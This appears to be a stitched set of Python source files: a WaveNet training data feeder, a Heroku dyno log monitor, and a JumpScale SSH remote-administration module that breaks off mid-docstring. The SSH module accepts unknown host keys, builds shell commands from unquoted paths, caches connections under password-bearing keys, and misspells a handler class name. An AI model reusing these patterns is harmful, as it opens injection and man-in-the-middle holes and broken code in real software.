self.inputs.set_shape(self._placeholders[0].shape)
self.targets = variables[1]
self.targets.set_shape(self._placeholders[1].shape)
self.input_lengths = variables[2]
self.input_lengths.set_shape(self._placeholders[2].shape)
#If local conditioning disabled override c inputs with None
if hparams.cin_channels < 0:
self.local_condition_features = None
else:
self.local_condition_features = variables[3]
self.local_condition_features.set_shape(self._placeholders[3].shape)
#If global conditioning disabled override g inputs with None
if hparams.gin_channels < 0:
self.global_condition_features = None
else:
self.global_condition_features = variables[4]
self.global_condition_features.set_shape(self._placeholders[4].shape)
# Create queue for buffering eval data
eval_queue = tf.FIFOQueue(1, queue_types, name='eval_queue')
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
eval_variables = eval_queue.dequeue()
self.eval_inputs = eval_variables[0]
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_targets = eval_variables[1]
self.eval_targets.set_shape(self._placeholders[1].shape)
self.eval_input_lengths = eval_variables[2]
self.eval_input_lengths.set_shape(self._placeholders[2].shape)
#If local conditioning disabled override c inputs with None
if hparams.cin_channels < 0:
self.eval_local_condition_features = None
else:
self.eval_local_condition_features = eval_variables[3]
self.eval_local_condition_features.set_shape(self._placeholders[3].shape)
#If global conditioning disabled override g inputs with None
if hparams.gin_channels < 0:
self.eval_global_condition_features = None
else:
self.eval_global_condition_features = eval_variables[4]
self.eval_global_condition_features.set_shape(self._placeholders[4].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name='background', target=self._enqueue_next_train_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
thread = threading.Thread(name='background', target=self._enqueue_next_test_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
def _get_test_groups(self):
meta = self._test_meta[self._test_offset]
self._test_offset += 1
if self._hparams.train_with_GTA:
mel_file = meta[2]
else:
mel_file = meta[1]
audio_file = meta[0]
input_data = np.load(os.path.join(self._base_dir, audio_file))
if self.local_condition:
local_condition_features = np.load(os.path.join(self._base_dir, mel_file))
else:
local_condition_features = None
global_condition_features = None
return (input_data, local_condition_features, global_condition_features, len(input_data))
def make_test_batches(self):
start = time.time()
#Read one example for evaluation
n = 1
#Test on entire test set (one sample at an evaluation step)
examples = [self._get_test_groups() for i in range(len(self._test_meta))]
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} test batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
return batches
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.wavenet_batch_size
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
            # Bucket examples based on similar output length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} train batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
test_batches = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
def _get_next_example(self):
'''Get a single example (input, output, len_output) from disk
'''
if self._train_offset >= len(self._train_meta):
self._train_offset = 0
np.random.shuffle(self._train_meta)
meta = self._train_meta[self._train_offset]
self._train_offset += 1
if self._hparams.train_with_GTA:
mel_file = meta[2]
if 'linear' in mel_file:
raise RuntimeError('Linear spectrogram files selected instead of GTA mels, did you specify the wrong metadata?')
else:
mel_file = meta[1]
audio_file = meta[0]
input_data = np.load(os.path.join(self._base_dir, audio_file))
if self.local_condition:
local_condition_features = np.load(os.path.join(self._base_dir, mel_file))
else:
local_condition_features = None
global_condition_features = None
return (input_data, local_condition_features, global_condition_features, len(input_data))
def _prepare_batch(self, batch):
np.random.shuffle(batch)
#Limit time steps to save GPU Memory usage
max_time_steps = self._limit_time()
#Adjust time resolution for upsampling
batch = self._adjust_time_resolution(batch, self.local_condition, max_time_steps)
#time lengths
input_lengths = [len(x[0]) for x in batch]
max_input_length = max(input_lengths)
inputs = self._prepare_inputs([x[0] for x in batch], max_input_length)
targets = self._prepare_targets([x[0] for x in batch], max_input_length)
local_condition_features = self._prepare_local_conditions(self.local_condition, [x[1] for x in batch])
global_condition_features = self._prepare_global_conditions(self.global_condition, [x[2] for x in batch])
new_batch = (inputs, targets, input_lengths)
if local_condition_features is not None:
new_batch += (local_condition_features, )
if global_condition_features is not None:
new_batch += (global_condition_features, )
return new_batch
def _prepare_inputs(self, inputs, maxlen):
if is_mulaw_quantize(self._hparams.input_type):
#[batch_size, time_steps, quantize_channels]
x_batch = np.stack([_pad_inputs(np_utils.to_categorical(
x, num_classes=self._hparams.quantize_channels), maxlen) for x in inputs]).astype(np.float32)
else:
#[batch_size, time_steps, 1]
x_batch = np.stack([_pad_inputs(x.reshape(-1, 1), maxlen) for x in inputs]).astype(np.float32)
assert len(x_batch.shape) == 3
#Convert to channels first [batch_size, quantize_channels (or 1), time_steps]
x_batch = np.transpose(x_batch, (0, 2, 1))
return x_batch
def _prepare_targets(self, targets, maxlen):
#[batch_size, time_steps]
if is_mulaw_quantize(self._hparams.input_type):
y_batch = np.stack([_pad_targets(x, maxlen) for x in targets]).astype(np.int32)
else:
y_batch = np.stack([_pad_targets(x, maxlen) for x in targets]).astype(np.float32)
assert len(y_batch.shape) == 2
#Add extra axis (make 3 dimension)
y_batch = np.expand_dims(y_batch, axis=-1)
return y_batch
def _prepare_local_conditions(self, local_condition, c_features):
if local_condition:
maxlen = max([len(x) for x in c_features])
c_batch = np.stack([_pad_inputs(x, maxlen) for x in c_features]).astype(np.float32)
assert len(c_batch.shape) == 3
#[batch_size, c_channels, time_steps]
c_batch = np.transpose(c_batch, (0, 2, 1))
else:
c_batch = None
return c_batch
def _prepare_global_conditions(self, global_condition, g_features):
if global_condition:
g_batch = g_features
else:
g_batch = None
return g_batch
def _check_conditions(self):
local_condition = self._hparams.cin_channels > 0
global_condition = self._hparams.gin_channels > 0
return local_condition, global_condition
def _limit_time(self):
'''Limit time resolution to save GPU memory.
'''
if self._hparams.max_time_sec is not None:
return int(self._hparams.max_time_sec * self._hparams.sample_rate)
elif self._hparams.max_time_steps is not None:
return self._hparams.max_time_steps
else:
return None
def _adjust_time_resolution(self, batch, local_condition, max_time_steps):
'''Adjust time resolution between audio and local condition
'''
if local_condition:
new_batch = []
for b in batch:
x, c, g, l = b
self._assert_ready_for_upsample(x, c)
if max_time_steps is not None:
max_steps = _ensure_divisible(max_time_steps, audio.get_hop_size(self._hparams), True)
if len(x) > max_time_steps:
max_time_frames = max_steps // audio.get_hop_size(self._hparams)
start = np.random.randint(0, len(c) - max_time_frames)
time_start = start * audio.get_hop_size(self._hparams)
x = x[time_start: time_start + max_time_frames * audio.get_hop_size(self._hparams)]
c = c[start: start + max_time_frames, :]
self._assert_ready_for_upsample(x, c)
new_batch.append((x, c, g, l))
return new_batch
else:
new_batch = []
for b in batch:
x, c, g, l = b
x = audio.trim(x)
if max_time_steps is not None and len(x) > max_time_steps:
                    start = np.random.randint(0, len(x) - max_time_steps)
x = x[start: start + max_time_steps]
new_batch.append((x, c, g, l))
return new_batch
def _assert_ready_for_upsample(self, x, c):
assert len(x) % len(c) == 0 and len(x) // len(c) == audio.get_hop_size(self._hparams)
def _pad_inputs(x, maxlen):
return np.pad(x, [(0, maxlen - len(x)), (0, 0)], mode='constant', constant_values=_pad)
def _pad_targets(x, maxlen):
return np.pad(x, (0, maxlen - len(x)), mode='constant', constant_values=_pad)
def _round_up(x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _ensure_divisible(length, divisible_by=256, lower=True):
if length % divisible_by == 0:
return length
if lower:
return length - length % divisible_by
else:
return length + (divisible_by - length % divisible_by)
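# Worked example (illustrative): with a hop size of 256 samples and
# max_time_steps=12000, _ensure_divisible(12000, 256, True) -> 11776, so
# max_time_frames = 11776 // 256 = 46 mel frames; _adjust_time_resolution then
# crops a random window of 46 frames and the matching 46 * 256 = 11776 samples.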
|
monitor.py
|
import sys
import time
import logging
import threading
import traceback
import load_django
from django.conf import settings
from utils.heroku import HerokuInterface
from utils.parser import parse
from utils.rule_helper import fetch_rules
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def sentinal():
fetch_rules()
logging.info("Sentinal thread run. Total thread count: {}".format(threading.active_count()))
logging.debug(threading.enumerate())
# Get all currently active threads. This will include all the logging threads
# and two additional threads:
# - Main Thread in stopped state,
# - and this (sentinal) Timer Thread in running state
active_threads = [th.name for th in threading.enumerate()]
for logsrc in list(settings.RULES.keys()):
if logsrc not in active_threads:
            # Log source not present in the thread list
# Creating the missing thread
start_thread(logsrc)
threading.Timer(settings.SENTINAL_THREAD_PERIOD, sentinal).start()
def stream_logs(app_name, source, dyno):
while True:
# Main Thread Loop
try:
for line in HerokuInterface().stream_log(app_name=app_name, source=source, dyno=dyno, timeout=100):
# Search for the required keywords in this line
logging.debug(line.decode('utf-8'))
exit = parse(line.decode('utf-8'), app_name, source, dyno)
if exit:
break
root = app_name + settings.SEPERATOR + source + settings.SEPERATOR + dyno
            exit = root not in settings.RULES
if exit:
break
except Exception:
logging.error(traceback.format_exc())
# TODO: Handle specific exceptions here
# Cooling period in case of errors
time.sleep(1)
logging.info("Stopping log thread: {}:{}:{}".format(app_name, source, dyno))
def start_thread(logsrc):
parts = logsrc.split(settings.SEPERATOR)
if len(parts) != 3:
logging.error("Invalid Rule: {}".format(logsrc))
return
t = threading.Thread(target=stream_logs, args=(parts[0], parts[1], parts[2]), name=logsrc)
t.start()
logging.info("Started log thread: {}".format(logsrc))
if __name__ == '__main__':
logging.info("Starting Dyno Monitor " + settings.ENVIRONMENT)
    if not settings.HEROKU_API_KEY:
        logging.error("Please specify HEROKU_API_KEY in the environment. Exiting Dyno Monitor")
        sys.exit(0)
    # start the sentinel timer only after the configuration check, so a misconfigured
    # process is not kept alive by the timer thread
    threading.Timer(settings.SENTINAL_THREAD_PERIOD, sentinal).start()
try:
        # List all separate log sources and create a thread for each
for logsrc in list(settings.RULES.keys()):
start_thread(logsrc)
except KeyboardInterrupt:
eprint('\nExiting by user request.\n')
except Exception:
traceback.print_exc(file=sys.stdout)
sys.exit(0)
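# Illustrative sketch (assumptions: settings.SEPERATOR == ':' and rules keyed by
# app, log source and dyno; neither is confirmed by this file): one RULES entry
# drives one named streaming thread, which the sentinal timer recreates if it dies.
#   logsrc = "my-app:heroku:router"
#   settings.RULES[logsrc] = [...]   # populated by fetch_rules()
#   start_thread(logsrc)             # -> stream_logs("my-app", "heroku", "router")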
|
RemoteSystem.py
|
from JumpScale import j
# This extension is available at j.remote.system
import warnings
warnings.filterwarnings('ignore', r'.*sha.*')
try:
import paramiko
except ImportError:
try:
j.system.platform.ubuntu.install("python-paramiko")
except Exception as e:
print "Could not install python-paramiko, this only works on ubuntu, please install it."
import paramiko
import os
import socket
from JumpScale import j
import signal
import SocketServer
import select
import threading
import re
import sys
class InvalidIpAddressError(ValueError):
pass
class RemoteSystemNotReachableError(RuntimeError):
pass
class RemoteSystemAuthenticationError(RuntimeError):
pass
class Exceptions(object):
RemoteSystemNotReachableError = RemoteSystemNotReachableError
RemoteSystemAuthenticationError = RemoteSystemAuthenticationError
InvalidIpAddressError = InvalidIpAddressError
class RemoteSystem(object):
name = "j.remote.system"
exceptions = Exceptions
def __init__(self):
self.connections={}
def connect(self, ip, login="", password="", timeout=120.0, port=22):
"""Creates a connection object to a remote system via ssh.
@param ip: Ipaddress of the remote system
@type ip: string
@param login: Username used for login on remote system
@type login: string
@param password: Password used for login on remote system
@type password: string
@param timeout: Timeout for the SSH session
@type timeout: float
@rtype: RemoteSystemConnection
@return: A connection object to the remote system
@raise RemoteSystemNotReachableError: An error occurred while connecting to the remote system
@raise RemoteSystemAuthenticationError: Could not authenticate to the remote system
        @raise socket.error: Unhandled network error
"""
# if not j.basetype.ipaddress.check(ip):
# raise InvalidIpAddressError("IP address is not a valid IPv4 address")
key="%s_%s_%s_%s"%(ip,login,password,port)
if self.connections.has_key(key):
return self.connections[key]
try:
remoteConnection = RemoteSystemConnection(ip, login, password, timeout, port)
except paramiko.AuthenticationException as authEx:
raise RemoteSystemAuthenticationError(authEx)
except paramiko.SSHException as sshEx:
raise RemoteSystemNotReachableError(sshEx)
except socket.timeout as e:
raise RemoteSystemNotReachableError(e)
except socket.error as e:
reraise = False
try:
if e[0] == 146:
raise RemoteSystemNotReachableError(e[1])
else:
raise
except IndexError:
reraise = True
if reraise:
raise
        self.connections[key] = remoteConnection
return remoteConnection
class RemoteSystemConnection(object):
def __init__(self, ip, login="", password="", timeout=120, port=22):
self._closed = False
self._ipaddress = ip
self._port = port
self._client = paramiko.SSHClient()
self._client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if password=="":
self._client.connect(hostname=ip, timeout=timeout,port=port, allow_agent=True, look_for_keys=True)
else:
self._client.connect(ip, username=login, password=password, timeout=timeout, port=port)
self._process = None
self._fs = None
self._portforward = None
def close(self):
"""Closes the connection to the remote system"""
self._client.close()
self._closed = True
def __getattribute__(self, name):
if object.__getattribute__(self, '_closed'):
raise RuntimeError('There is no active connection.')
return object.__getattribute__(self, name)
def _getProcess(self):
if not self._process:
self._process = RemoteSystemProcess(self._client)
return self._process
def _getFs(self):
if not self._fs:
self._fs = RemoteSystemFS(self._client)
return self._fs
def _getIpAddress(self):
return self._ipaddress
def _getPortForward(self):
if not self._portforward:
self._portforward = RemoteSystemPortForward(self._client, self._getProcess())
return self._portforward
process = property(fget=_getProcess)
fs = property(fget=_getFs)
ipaddress = property(fget=_getIpAddress, doc="IP address of the machine you are connected to")
portforward = property(fget=_getPortForward, doc="Executes remote and local port forwarding using the connecting machine as ssh server")
class _remoteSystemObject(object):
def __init__(self, connection, ipaddress=None):
if not isinstance(connection, paramiko.SSHClient):
raise TypeError('The connection parameter is not of type paramiko.SSHClient')
self._connection = connection
self._ipaddress = ipaddress or connection.get_transport().sock.getpeername()[0]
class RemoteSystemProcess(_remoteSystemObject):
def _execute_common(self, command, dieOnNonZeroExitCode=True, tostdout=True):
"""
only works on all platforms
return a tuple of (exitcode, stdout, stderr)
Execute a command on the SSH server. Wait till output done.
@raise SSHException: if the server fails to execute the command
"""
j.logger.log("Execute ssh command %s on %s" % (command, self._ipaddress))
#channel = self._connection.get_transport().open_session()
# ipshell()
# stdin, channelFileStdOut, channelFileStdErr=self._connection.exec_command(command)
        # Code copied from self._connection.exec_command(command); it is identical
bufsize = -1
chan = self._connection.get_transport().open_session()
chan.exec_command(command)
channelFileStdin = chan.makefile('wb', bufsize)
channelFileStdOut = chan.makefile('rb', bufsize)
channelFileStdErr = chan.makefile_stderr('rb', bufsize)
# return stdin, stdout, stderr
myOut = ""
myErr = ""
while (not channelFileStdOut.channel.eof_received) or (not channelFileStdErr.channel.eof_received):
if channelFileStdOut.channel.recv_ready():
tmp = (channelFileStdOut.channel.recv(1024))
j.logger.log("ssh %s out:%s" % (self._ipaddress, tmp), 3)
if tostdout:
print tmp.strip()
myOut += tmp
if channelFileStdErr.channel.recv_stderr_ready():
tmp = (channelFileStdErr.channel.recv_stderr(1024))
j.logger.log("ssh %s err:%s" % (self._ipaddress, tmp), 4)
myErr += tmp
tmp = channelFileStdOut.read()
j.logger.log("ssh %s out:%s" % (self._ipaddress, tmp), 3)
myOut += tmp
tmp = channelFileStdErr.read()
j.logger.log("ssh %s err:%s" % (self._ipaddress, tmp), 4)
myErr += tmp
exitcode = chan.recv_exit_status()
# print 'Output:' + myOut
# print 'Error:' + myErr
# print 'ExitCode:' + str(exitcode)
# Only die if exitcode != 0, error != '' is not enough to conclude that the process went wrong because it may only be warnings!
if dieOnNonZeroExitCode and exitcode != 0:
raise RuntimeError("Process terminated with non 0 exitcode, got exitcode %s.\nout:%s\nerror:%s" % (str(exitcode), myOut, myErr))
return exitcode, myOut, myErr
    # Todo tomorrow: refactor other methods to use this one
# For now don't break code
def execute(self, command, dieOnNonZeroExitCode=False, outputToStdout=True, loglevel=5, timeout=None):
"""Executes a command, returns the exitcode and the output
@param command: command to execute
@type command: string
@param dieOnNonZeroExitCode: die if got non zero exitcode
@type dieOnNonZeroExitCode: bool
        @param outputToStdout: when True, the command output is also printed to stdout
@param timeout: seconds to wait for a pending read/write operation. Infinity if omitted
@type timeout: float
        @rtype: tuple
        @return: tuple of (exitcode, output, error output) of the executed command. If exitcode is not zero then the executed command returned with errors
"""
#@Todo: Timeout, outputToStdout, loglevel not used
        # are they useful or simply there for backwards compatibility?
if j.system.platformtype.has_parent("unix"):
exitcode, output, error = self._executeUnix(command, dieOnNonZeroExitCode)
else:
exitcode, output, error = self._execute_common(command, dieOnNonZeroExitCode, tostdout=outputToStdout)
return exitcode, output, error
def _executeUnix(self, command, dieOnError=True, timeout=0):
"""
only works for unix
Execute a command on the SSH server. Wait till output done.
@raise SSHException: if the server fails to execute the command
"""
command = command + ' ; echo "***EXITCODE***:$?"'
exitcode, output, error = self._execute_common(command, dieOnNonZeroExitCode=False)
# Not correct, many command issue warnings on stderr!
# if len(error.strip())>0 and dieOnError:
# raise RuntimeError("Could not execute %s on %s, output was \n%s\n%s\n" % (command,self._ipaddress,myOut,myErr))
index = output.find("***EXITCODE***:")
        if index == -1:  # Something unknown went wrong, we did not receive all output
exitcode = 1000
# raise RuntimeError("Did not get all output from executing the SSH command %s" % command) ??
else:
            length = len("***EXITCODE***:")
            exitcodestr = output[index + length:]
exitcode = int(exitcodestr) # get the exit code
output = output[:index] # clean the output
if dieOnError and exitcode == 1000:
message = "Process terminated with unknown exitcode!!.\nOutput:\n%s.\nError:\n%s\n" % (output, error)
j.errorconditionhandler.raiseOperationalCritical(message, category="system.remote.execute.fatalerror", die=True)
if dieOnError and exitcode != 0:
message = "Process terminated with non 0 exitcode, got exitcode: " + str(exitcode) + " and Error:\n" + error + "\n\nOutput:\n" + output
j.errorconditionhandler.raiseOperationalCritical(message, category="system.remote.execute.fatalerror", die=True)
return exitcode, output, error
def killProcess(self, pid):
"""
Kills a process using sigterm signal
@param pid: process id of the process to be killed
@type pid: int
"""
command = 'kill -%(signum)s %(pid)s' % {'pid': pid, 'signum': signal.SIGTERM}
        exitCode, output, error = self.execute(command, dieOnNonZeroExitCode=False, outputToStdout=False)
if exitCode:
j.console.echo('Failed to execute remote command %s. Reason %s' % (command, output))
return exitCode, output
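# Usage sketch (illustrative, not part of the original module): a typical session
# through this extension, assuming a reachable host and valid credentials:
#   con = j.remote.system.connect("192.168.1.10", login="root", password="secret")
#   exitcode, out, err = con.process.execute("uname -a")
#   con.fs.writeFile("/tmp/hello.txt", "hello world")
#   con.close()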
class RemoteSystemFS(_remoteSystemObject):
def uploadFile(self, localpath, remotepath):
"""Copy a local file (localpath) to the remote system as remotepath
@param localpath: the local file to copy
@type localpath: string
@param remotepath: the destination path on the remote system
@type remotepath: string
@raise TypeError: localpath or remotepath is None
"""
if localpath is None:
raise TypeError('Local path is None in remotesystem.fs.uploadFile')
if remotepath is None:
raise TypeError('Remote path is None in remotesystem.fs.uploadFile')
sf = self._connection.open_sftp()
try:
sf.put(localpath, remotepath)
j.logger.log('Uploaded file %s to %s' % (localpath, remotepath))
finally:
sf.close()
def fileGetContents(self, filename):
"""Read a file and get contents of that file
@param filename: filename to open for reading
@type filename: string
@rtype: string
@return: representing the file contents
@raise TypeError: filename is None
"""
if filename is None:
raise TypeError('File name is None in remotesystem.fs.fileGetContents')
localfile = j.system.fs.getTempFileName()
sf = self._connection.open_sftp()
try:
j.logger.log('Opened SFTP connection to receive file %s' % filename)
try:
sf.get(filename, localfile)
j.logger.log('Saved %s file to %s' % (filename, localfile))
return j.system.fs.fileGetContents(localfile)
finally:
j.system.fs.remove(localfile)
finally:
sf.close()
def writeFile(self, filename, contents):
"""Open a file and write file contents, close file afterwards
@param filename: filename to open for writing
@type filename: string
@param contents: file contents to be written
@type contents: string
@raise TypeError: filename or contents passed are None
@raise ValueError: filename should be a full path
"""
if (filename is None) or (contents is None):
raise TypeError('Passed None parameters in remotesystem.fs.writeFile')
if not filename.startswith('/'):
raise ValueError('Filename should be a full path!')
localfile = j.system.fs.getTempFileName()
try:
# Don't bother copying the file first - we're going to clobber it anyway
j.system.fs.writeFile(localfile, contents)
sf = self._connection.open_sftp()
try:
j.logger.log('Opened SFTP connection to send %s to %s' % (localfile, filename))
sf.put(localfile, filename)
finally:
sf.close()
finally:
j.system.fs.remove(localfile)
def exists(self, path):
"""Check if the specified path exists
@param path: string
        @rtype: boolean (True if path refers to an existing path, False for broken symbolic links)
"""
if path is None:
raise TypeError('Path is not passed in remote.system.fs.exists')
sf = self._connection.open_sftp()
try:
sf.stat(path)
except IOError as e:
if e.errno == 2:
                j.logger.log('path %s does not exist' % str(path.encode("utf-8")), 8)
return False
else:
raise
except:
raise
finally:
sf.close()
j.logger.log('path %s exists' % str(path.encode("utf-8")), 8)
return True
def isDir(self, path):
"""Check if the specified Directory path exists
@param path: string
@rtype: boolean (True if directory exists)
@raise TypeError: path is empty
"""
if (path is None):
raise TypeError('Directory path is None in system.fs.isDir')
sf = self._connection.open_sftp()
try:
sf.listdir(path)
except IOError as e:
if e.errno == 2:
j.logger.log('path [%s] is not a directory' % path.encode("utf-8"), 8)
return False
else:
raise
finally:
j.logger.log('path [%s] is a directory' % path.encode("utf-8"), 8)
sf.close()
return True
def createDir(self, newdir):
"""Create new Directory
@param newdir: string (Directory path/name)
if newdir was only given as a directory name, the new directory will be created on the default path,
if newdir was given as a complete path with the directory name, the new directory will be created in the specified path
@raise TypeError: newdir parameter is empty
@raise RuntimeError: failed to create directory
"""
j.logger.log('Creating directory if not exists %s' % newdir.encode("utf-8"), 8)
if newdir == '' or newdir == None:
raise TypeError('The newdir-parameter of system.fs.createDir() is None or an empty string.')
try:
if self.exists(newdir):
j.logger.log('Directory trying to create: [%s] already exists' % newdir.encode("utf-8"), 8)
pass
else:
head, tail = os.path.split(newdir)
if head and not self.isDir(head):
self.createDir(head)
if tail:
sf = self._connection.open_sftp()
try:
sf.mkdir(newdir)
finally:
sf.close()
j.logger.log('Created the directory [%s]' % newdir.encode("utf-8"), 8)
except:
raise RuntimeError("Failed to create the directory [%s]" % newdir.encode("utf-8"))
def copyDirTree(self, src, dst, keepsymlinks=False):
"""Recursively copy an entire directory tree rooted at src
The dst directory may already exist; if not,
it will be created as well as missing parent directories
@param src: string (source of directory tree to be copied)
@param dst: string (path directory to be copied to...should not already exist)
@param keepsymlinks: bool (True keeps symlinks instead of copying the content of the file)
@raise TypeError: src or dst is empty
"""
if ((src is None) or (dst is None)):
raise TypeError('Not enough parameters passed in system.fs.copyDirTree to copy directory from %s to %s ' % (src, dst))
stdin, stdout, stderr = self._connection.exec_command('uname -s')
solaris = False
for line in stdout:
if line.startswith('SunOS'):
j.logger.log("Solaris", 5)
solaris = True
if solaris:
if keepsymlinks:
symlinks = '-P'
else:
symlinks = ''
else:
j.logger.log("No solaris", 5)
if keepsymlinks:
symlinks = '-L'
else:
symlinks = '-P'
if self.isDir(src):
if not self.exists(dst):
self.createDir(dst)
cmd = 'cp -rf %s %s/* %s' % (symlinks, src, dst)
j.logger.log("Executing [%s]" % cmd, 5)
self._connection.exec_command(cmd)
else:
raise RuntimeError('Source path %s in remote.system.fs.copyDirTree is not a directory' % src)
def copyDirTreeLocalRemote(self, source, destination="", removeNonRelevantFiles=False):
"""
Recursively copy an entire directory tree rooted at source.
The destination directory may already exist; if not, it will be created
Parameters:
- source: string (source of directory tree to be copied)
- destination: string (path directory to be copied to...should not already exist)
            if destination is not specified, the same location as source will be used
"""
#@todo check and fix
raise RuntimeError("not fully implemented yet")
if destination == "":
destination = source
dirs = {}
self.executewait("mkdir -p %s" % destination)
ftp = self.getSFtpConnection()
if removeNonRelevantFiles:
self._removeRedundantFiles(source)
files = j.system.fs.listFilesInDir(source, recursive=True)
j.logger.log("Coppy %s files from %s to %s" % (len(files), source, destination), 2)
for filepath in files:
dest = j.system.fs.joinPaths(destination, j.system.fs.pathRemoveDirPart(filepath, source))
destdir = j.system.fs.getDirName(dest)
if destdir not in dirs:
j.logger.log("Create dir %s" % (destdir))
# ftp.mkdir(destdir)
self.executewait("mkdir -p %s" % destdir)
dirs[destdir] = 1
j.logger.log("put %s to %s" % (filepath, dest))
ftp.put(filepath, dest)
def moveFile(self, source, destination):
"""Move a file from source path to destination path
@param source: Source file path
@type source: string
@param destination: Destination path the file should be moved to
@type destination: string
        @raise TypeError: source or destination is empty
@raise RuntimeError: Specified source / destination does not exist
@raise RuntimeError: file could not be moved
"""
j.logger.log('Move file from %s to %s' % (source, destination), 6)
if not source or not destination:
raise ValueError("Not enough parameters given to remote.system.fs.moveFile: move from %s, to %s" % (source, destination))
try:
if(self.isFile(source)):
if(self.isDir(destination)):
self.copyFile(source, destination)
self.removeFile(source)
else:
raise RuntimeError("The specified destination path in system.fs.moveFile does not exist: %s" % destination)
else:
raise RuntimeError("The specified source path in system.fs.moveFile does not exist: %s" % source)
except:
raise RuntimeError("File could not be moved...in remote.system.fs.moveFile: from %s to %s " % (source, destination))
def isFile(self, name):
"""Check if the specified file exists for the given path
@param name: string
@rtype: boolean (True if file exists for the given path)
@raise TypeError: name is empty
"""
j.logger.log("isfile:%s" % name, 8)
if (name is None):
raise TypeError('File name is None in remote.system.fs.isFile')
sf = self._connection.open_sftp()
if self.exists(name):
try:
sf.listdir(name)
except IOError as e:
if e.errno == 2:
j.logger.log('[%s] is a file' % name.encode("utf-8"), 8)
return True
else:
raise
finally:
j.logger.log('[%s] is not a file' % name.encode("utf-8"), 8)
sf.close()
return False
def removeFile(self, path):
"""Remove a file
@param path: File path required to be removed
@type path: string
@raise TypeError: path is empty
"""
j.logger.log('Removing file with path: %s' % path, 6)
if not path:
raise TypeError('Not enough parameters passed to system.fs.removeFile: %s' % path)
if(self.exists(path)):
if(self.isFile(path)):
sf = self._connection.open_sftp()
try:
sf.remove(path)
j.logger.log('Done removing file with path: %s' % path)
except:
raise RuntimeError("File with path: %s could not be removed\nDetails: %s" % (path, sys.exc_info()[0]))
finally:
sf.close()
else:
raise RuntimeError("Path: %s is not a file in remote.system.fs.removeFile" % path)
else:
raise RuntimeError("Path: %s does not exist in remote.system.fs.removeFile" % path)
def copyFile(self, fileFrom, fileTo):
"""Copy file
Copies the file from C{fileFrom} to the file or directory C{to}.
If C{to} is a directory, a file with the same basename as C{fileFrom} is
created (or overwritten) in the directory specified.
Permission bits are copied.
@param fileFrom: Source file path name
@type fileFrom: string
@param fileTo: Destination file or folder path name
@type fileTo: string
@raise TypeError: fileFrom or to is empty
@raise RuntimeError: Cannot copy file
"""
j.logger.log("Copy file from %s to %s" % (fileFrom, fileTo), 6)
if not fileFrom or not fileTo:
raise TypeError("No parameters given to system.fs.copyFile from %s, to %s" % (fileFrom, fileTo))
try:
if self.isFile(fileFrom):
cmd = 'cp %s %s' % (fileFrom, fileTo)
self._connection.exec_command(cmd)
else:
raise RuntimeError("Cannot copy file, file: %s does not exist in system.fs.copyFile" % fileFrom)
except:
raise RuntimeError("Failed to copy file from %s to %s" % (fileFrom, fileTo))
def isEmptyDir(self, path):
"""Check whether a directory is empty
@param path: Directory to check
@type path: string"""
if not path:
raise TypeError('Not enough parameters passed to system.fs.isEmptyDir: %s' % path)
if not self.exists(path):
raise RuntimeError('Remote path %s does not exist' % path)
if not self.isDir(path):
raise RuntimeError('Remote path %s is not a directory' % path)
sf = self._connection.open_sftp()
try:
subcount = sf.listdir(path)
if len(subcount) == 0:
return True
else:
return False
finally:
sf.close()
class RemotePortForwardHander(object):
def __init__(self):
        # Keep track of registered forwards: forwards[(server_addr, server_port)] = (local_addr, local_port)
self.forwards = {}
    def accept(self, channel, origin, server):
        (origin_addr, origin_port) = origin
        (server_addr, server_port) = server
        j.logger.log('port_forward_handler:accept New connection: "%s" "%s" "%s" "%s" "%s" "%s"' %
(id(self), id(channel), origin_addr, origin_port, server_addr, server_port))
j.logger.log('port_forward_handler:accept channel.fileno: %s' % channel.fileno())
if (server_addr, server_port) not in self.forwards:
raise ValueError('Failed to handle RemoteForward: No forward registered for %s.\nRegistered forwards: %s' %
(str((server_addr, server_port)), self.forwards))
local_address, local_port = self.forwards[(server_addr, server_port)]
handler_thread = threading.Thread(target=self.handle, args=(channel, local_address, local_port))
handler_thread.setDaemon(True)
handler_thread.start()
def handle(self, channel, local_address, local_port):
'''
Is called from a different thread whenever a forwarded connection arrives.
'''
#j.logger.log('port_forward_handler: New connection: "%s" "%s" "%s" "%s" "%s"' % (id(channel), origin_addr, origin_port, server_addr, server_port))
sock = socket.socket()
try:
sock.connect((local_address, local_port))
except Exception as e:
j.logger.log('port_forward_handler:handle Forwarding request to %s:%d failed: %r' % (local_address, local_port, e), 5)
return
j.logger.log('port_forward_handler:handle Connected! Tunnel open %r -> %r' %
(channel.getpeername(), (local_address, local_port)), 5)
while True:
r, w, x = select.select([sock, channel], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
channel.send(data)
if channel in r:
data = channel.recv(1024)
if len(data) == 0:
break
sock.send(data)
j.logger.log('port_forward_handler:handle Tunnel closed from %r to %s' % (channel.getpeername(), (local_address, local_port)), 5)
channel.close()
sock.close()
class RemoteSystemPortForward(_remoteSystemObject):
def __init__(self, client, process):
"""
Initialize a Remote Port forward system
"""
_remoteSystemObject.__init__(self, client)
self.process = process
self.remote_forward_handler = RemotePortForwardHandler()
def forwardRemotePort(self, serverPort, remoteHost, remotePort, serverHost='', inThread=False):
"""
Set up a reverse forwarding tunnel across an SSH server
@param serverPort: port on server to forward (0 to let server assign port)
